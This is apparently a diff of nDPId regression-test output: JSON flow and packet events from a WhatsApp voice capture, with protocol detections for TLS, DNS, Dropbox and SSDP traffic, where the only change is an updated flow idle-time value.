-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1561455689909,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1561455689909,"pkt":"xiwDYGpkkLkxKPrKCABFAABAAABAAEAGAsTAqAIMHw1WM8VHAbtOnG1kAAAAALDC\/\/9BlgAAAgQFtAEDAwcBAQgKNM4E3wAAAAAEAgAA"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1561455689928,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1561455689928,"pkt":"kLkxKPrKxiwDYGpkCABFAAA8AAAAAFQGLsgfDVYzwKgCDAG7xUfuAwj8TpxtZaASbHDC9wAAAgQFeAQCCAqHqaVzNM4E3wEDAwg="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1561455690036,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1561455690036,"pkt":"xiwDYGpkkLkxKPrKCABFAAA0AABAAEAGAtDAqAIMHw1WM8VHAbtOnG1l7gMI\/YAQBAZZdQAAAQEICjTOBV2HqaVz"} -00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1561455689909,"flow_last_seen":1561455690039,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1561455690039,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.51","src_port":50503,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"media-mxp1-1.cdn.whatsapp.net","ja3":"b92a79ed03c3ff5611abb2305370d3e3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1561455689909,"flow_last_seen":1561455690058,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1561455690058,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.51","src_port":50503,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.3","client_requested_server_name":"media-mxp1-1.cdn.whatsapp.net","ja3":"b92a79ed03c3ff5611abb2305370d3e3","ja3s":"475c9302dc42b2751db9edcac3b74891","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455689909,"flow_last_seen":1561455689909,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1561455689909,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.51","src_port":50503,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1561455689909,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1561455689909,"pkt":"xiwDYGpkkLkxKPrKCABFAABAAABAAEAGAsTAqAIMHw1WM8VHAbtOnG1kAAAAALDC\/\/9BlgAAAgQFtAEDAwcBAQgKNM4E3wAAAAAEAgAA"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1561455689928,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1561455689928,"pkt":"kLkxKPrKxiwDYGpkCABFAAA8AAAAAFQGLsgfDVYzwKgCDAG7xUfuAwj8TpxtZaASbHDC9wAAAgQFeAQCCAqHqaVzNM4E3wEDAwg="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1561455690036,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1561455690036,"pkt":"xiwDYGpkkLkxKPrKCABFAAA0AABAAEAGAtDAqAIMHw1WM8VHAbtOnG1l7gMI\/YAQBAZZdQAAAQEICjTOBV2HqaVz"} +00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1561455689909,"flow_last_seen":1561455690039,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1561455690039,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.51","src_port":50503,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"media-mxp1-1.cdn.whatsapp.net","ja3":"b92a79ed03c3ff5611abb2305370d3e3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1561455689909,"flow_last_seen":1561455690058,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1561455690058,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.51","src_port":50503,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.3","client_requested_server_name":"media-mxp1-1.cdn.whatsapp.net","ja3":"b92a79ed03c3ff5611abb2305370d3e3","ja3s":"475c9302dc42b2751db9edcac3b74891","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":181,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455701309,"flow_last_seen":1561455701309,"flow_idle_time":180000,"flow_min_l4_payload_len":341,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":341,"flow_avg_l4_payload_len":341,"midstream":0,"thread_ts_msec":1561455701309,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00902{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1561455701309,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":383,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":383,"pkt_l4_len":349,"thread_ts_msec":1561455701309,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAFxXcMAAEARlWjAqAIBwKgC\/0RcRFwBXbU+eyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiAxNzQ1NjcxOTM5MjIwMTQ2OTg4Njg4NzAzNTEyMjAyNTg3OTI0NDMsICJkaXNwbGF5bmFtZSI6ICIiLCAibmFtZXNwYWNlcyI6IFsyNzUwMzcwNTYwLCA3ODUyNjYxNzcsIDE1MjYyNjMwNDUsIDEzMzg2NTkyMDEsIDE0ODE5MzM3LCA0ODA5NDIwMDQ4LCA1MTE3MDY2NDIsIDczNjM0MTUyOCwgOTM4ODEzODQ5LCAxMjY3Njk1MTA5LCA1NDQwNDA3MDcyLCA0ODEwNTkxNzYwLCA1ODM0NDk5NiwgOTk2MzA2MjE1LCA1MzAzMzAxMjQ4LCAzMDc1NTIxNjk2LCA0MDU2NDYyNTkyLCAyOTYzNjgyMDk2LCAxNTIyMTc3NTg3XX0="} 00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455701309,"flow_last_seen":1561455701309,"flow_idle_time":180000,"flow_min_l4_payload_len":341,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":341,"flow_avg_l4_payload_len":341,"midstream":0,"thread_ts_msec":1561455701309,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00899{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1561455701310,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":381,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":381,"pkt_l4_len":347,"thread_ts_msec":1561455701310,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAFvHu4AAEAR1D\/AqAIBwKgC\/0RcRFwBW7HJeyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiAxNzQ1NjcxOTM5MjIwMTQ2OTg4Njg4NzAzNTEyMjAyNTg3OTI0NDMsICJkaXNwbGF5bmFtZSI6ICIiLCAibmFtZXNwYWNlcyI6IFsxMTgyMzk1NTczLCAxNDIxMTE0Mzk5LCAxODA4MDQ3NjgwLCAxMzcyMDkyNjA5LCAxMjUyMTE2NDI5LCA5OTQ2OTc3MywgNTI1ODAwNzEyMCwgMTc2OTY0MzA3LCAxMjU1NDA1NjYsIDEwNDc0MjgxODksIDQ3MTYxOTAwNDgsIDU0NjcxNjMwODgsIDExOTUwNDQwNzEsIDk2ODUzMjI0LCAxNzYwOTk2MywgNDUxNDcyNjU4LCA0MTc0NjUwODgwLCAyODUyMTYwNywgMTQxNTYyMDM1MF19"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":186,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455702980,"flow_last_seen":1561455702980,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1561455702980,"l3_proto":"ip4","src_ip":"17.171.47.85","dst_ip":"192.168.2.12","src_port":443,"dst_port":50502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1561455702980,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1561455702980,"pkt":"kLkxKPrKxiwDYGpkCABFAgBT1H4AAC8Gs3ARqy9VwKgCDAG7xUbop23K2+r6qYAYAEJmGwAAAQEICipMBbM0zcKkFQMDABo0yWx0nf4Y8Lruj7Xpo7KOiHQ6o5fprSXAlA=="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":187,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1561455702981,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1561455702981,"pkt":"kLkxKPrKxiwDYGpkCABFAAA01H8AAC8Gs5ARqy9VwKgCDAG7xUbop23p2+r6qYARAEJXLQAAAQEICipMBbM0zcKk"} -00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1561455703144,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1561455703144,"pkt":"xiwDYGpkkLkxKPrKCABFAgBTAABAAEAGNu\/AqAIMEasvVcVGAbvb6vqp6KdtyoAYBACmYwAAAQEICjTOOFoqS5CDFQMDABoAAAAAAAAAAyfFNdvhqDfXGuNhDL9lpNkkKA=="} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":186,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455702980,"flow_last_seen":1561455702980,"flow_idle_time":7560000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1561455702980,"l3_proto":"ip4","src_ip":"17.171.47.85","dst_ip":"192.168.2.12","src_port":443,"dst_port":50502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1561455702980,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1561455702980,"pkt":"kLkxKPrKxiwDYGpkCABFAgBT1H4AAC8Gs3ARqy9VwKgCDAG7xUbop23K2+r6qYAYAEJmGwAAAQEICipMBbM0zcKkFQMDABo0yWx0nf4Y8Lruj7Xpo7KOiHQ6o5fprSXAlA=="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":187,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1561455702981,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1561455702981,"pkt":"kLkxKPrKxiwDYGpkCABFAAA01H8AAC8Gs5ARqy9VwKgCDAG7xUbop23p2+r6qYARAEJXLQAAAQEICipMBbM0zcKk"} +00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1561455703144,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1561455703144,"pkt":"xiwDYGpkkLkxKPrKCABFAgBTAABAAEAGNu\/AqAIMEasvVcVGAbvb6vqp6KdtyoAYBACmYwAAAQEICjTOOFoqS5CDFQMDABoAAAAAAAAAAyfFNdvhqDfXGuNhDL9lpNkkKA=="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":197,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455704556,"flow_last_seen":1561455704556,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455704556,"l3_proto":"ip4","src_ip":"169.254.162.244","dst_ip":"239.255.255.250","src_port":50384,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1561455704556,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455704556,"pkt":"AQBef\/\/62DBiVgAcCABFAACa1ogAAP8Rp9yp\/qL07\/\/\/+sTQB2wAhsguTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"} 00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":197,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455704556,"flow_last_seen":1561455704556,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455704556,"l3_proto":"ip4","src_ip":"169.254.162.244","dst_ip":"239.255.255.250","src_port":50384,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} @@ -90,12 +90,12 @@ 00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":232,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455707435,"flow_last_seen":1561455707435,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1561455707435,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60549,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"pps.whatsapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00538{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":240,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1561455707470,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":117,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":117,"pkt_l4_len":83,"thread_ts_msec":1561455707470,"pkt":"kLkxKPrKxiwDYGpkCABFAABnIjoAAEAR0u7AqAIBwKgCDAA17IUAUyY\/fx+BgAABAAIAAAAAA3Bwcwh3aGF0c2FwcANuZXQAAAEAAcAMAAUAAQAACz4ADQZtbXgtZHMDY2RuwBDALgABAAEAAAA+AASd8BQ0"} 00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455707435,"flow_last_seen":1561455707470,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1561455707470,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60549,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"pps.whatsapp.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"157.240.20.52"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":241,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455707474,"flow_last_seen":1561455707474,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1561455707474,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.52","src_port":50504,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":241,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1561455707474,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1561455707474,"pkt":"xiwDYGpkkLkxKPrKCABFAABAAABAAEAGxd\/AqAIMnfAUNMVIAbt68MpNAAAAALDC\/\/823wAAAgQFtAEDAwcBAQgKNM5JcwAAAAAEAgAA"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":249,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1561455707511,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1561455707511,"pkt":"kLkxKPrKxiwDYGpkCABFAAA8AAAAAFMG8uOd8BQ0wKgCDAG7xUi7sKeEevDKTqASbHBlBQAAAgQFeAQCCAq1oF6CNM5JcwEDAwg="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":250,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1561455707513,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1561455707513,"pkt":"xiwDYGpkkLkxKPrKCABFAAA0AABAAEAGxevAqAIMnfAUNMVIAbt68MpOu7CnhYAQBAb72QAAAQEICjTOSZq1oF6C"} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":251,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1561455707474,"flow_last_seen":1561455707524,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1561455707524,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.52","src_port":50504,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsApp","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pps.whatsapp.net","ja3":"7a7a639628f0fe5c7e057628a5bbec5a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00994{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":253,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1561455707474,"flow_last_seen":1561455707564,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1561455707564,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.52","src_port":50504,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsApp","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.3","client_requested_server_name":"pps.whatsapp.net","ja3":"7a7a639628f0fe5c7e057628a5bbec5a","ja3s":"475c9302dc42b2751db9edcac3b74891","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":241,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455707474,"flow_last_seen":1561455707474,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1561455707474,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.52","src_port":50504,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":241,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1561455707474,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1561455707474,"pkt":"xiwDYGpkkLkxKPrKCABFAABAAABAAEAGxd\/AqAIMnfAUNMVIAbt68MpNAAAAALDC\/\/823wAAAgQFtAEDAwcBAQgKNM5JcwAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":249,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1561455707511,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1561455707511,"pkt":"kLkxKPrKxiwDYGpkCABFAAA8AAAAAFMG8uOd8BQ0wKgCDAG7xUi7sKeEevDKTqASbHBlBQAAAgQFeAQCCAq1oF6CNM5JcwEDAwg="} 